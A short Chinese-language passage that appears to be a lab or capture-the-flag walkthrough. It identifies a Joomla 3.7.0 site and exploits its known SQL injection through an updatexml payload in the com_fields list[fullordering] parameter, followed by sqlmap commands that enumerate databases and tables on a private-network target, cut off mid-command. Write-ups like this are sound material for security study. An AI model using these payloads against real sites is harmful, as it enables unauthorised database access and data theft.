首先设置成下面的样子再运行
开放80端口,去访问一下。搜索对应CMS漏洞,存在sql注入漏洞,Joomla 3.7.0 SQL注入漏洞。payload
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" --dbs //爆数据库
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb --tables //爆表名
sqlmap -u "h